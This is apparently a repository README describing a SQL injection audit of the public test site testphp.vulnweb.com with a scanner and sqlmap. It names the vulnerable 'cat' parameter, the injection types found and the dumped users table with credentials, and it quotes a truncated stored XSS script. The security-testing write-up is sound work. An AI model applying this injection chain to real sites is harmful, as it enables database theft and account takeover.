A comprehensive technical walk-through of a successful vulnerability chain discovery and data exfiltration.
This repository documents a complete end-to-end security audit. Using proprietary automation, I identified a critical SQL injection (SQLi) vulnerability in a web application running on Nginx 1.19.0 and PHP 5.6.40. The vulnerability allowed for unauthorized access to the backend database, leading to the successful exfiltration of the entire users table, including plaintext credentials and sensitive PII.
The exploitation lifecycle began with a scan using Bubble-Scanner. The scanner's event-driven engine identified a hidden endpoint and immediately flagged a potential SQLi vulnerability by detecting backend syntax errors upon injecting an escape character (').
- Scan Start: Tue Feb 17 01:14:11 PM EST 2026
- Target: http://testphp.vulnweb.com
- Finding:
โโ [!!!] SQLi VULNERABILITY DETECTED
Following discovery, sqlmap was utilized to validate the injection point on the cat parameter of the listproducts.php endpoint.
- Back-end DBMS: MySQL >= 5.6
- Operating System: Linux Ubuntu
- Injection Types Identified:
- Boolean-based blind:
AND boolean-based blind - WHERE or HAVING clause - Error-based:
MySQL >= 5.6 AND error-based - Time-based blind:
MySQL >= 5.0.12 AND time-based blind (query SLEEP) - UNION query:
Generic UNION query (NULL) - 11 columns
- Boolean-based blind:
The vulnerability provided deep access to the database architecture, allowing for the mapping of the acuart database and the extraction of sensitive tables.
acuartinformation_schema
The acuart.users table was found to contain 8 critical columns, including uname (Username), pass (Password), email, and cc (Credit Card / Sensitive Data).
Final exfiltration demonstrated a complete breach of confidentiality. I successfully dumped records from the users table, revealing insecure data storage practices.
- Username:
test - Password:
test - Email:
you - Notes: Includes stored XSS vectors such as
<script>window.location=...</script>
The successful exploitation of this vulnerability represents a Critical Risk to organizational data integrity and citizen privacy.
- Mass Data Exfiltration: Unauthorized access to PII and credentials constitutes a major security breach.
- Account Takeover (ATO): Access to plaintext passwords allows for immediate account compromise.
- Persistent Threat Vector: Stored XSS vectors identified in the database dump suggest a secondary attack surface for session hijacking.
- Legacy Risk: The use of end-of-life software (PHP 5.6.40) significantly increases the attack surface.
This documentation is for Educational and Ethical Security Testing only. All screenshots and data were gathered from a legally authorized vulnerability testing environment (testphp.vulnweb.com).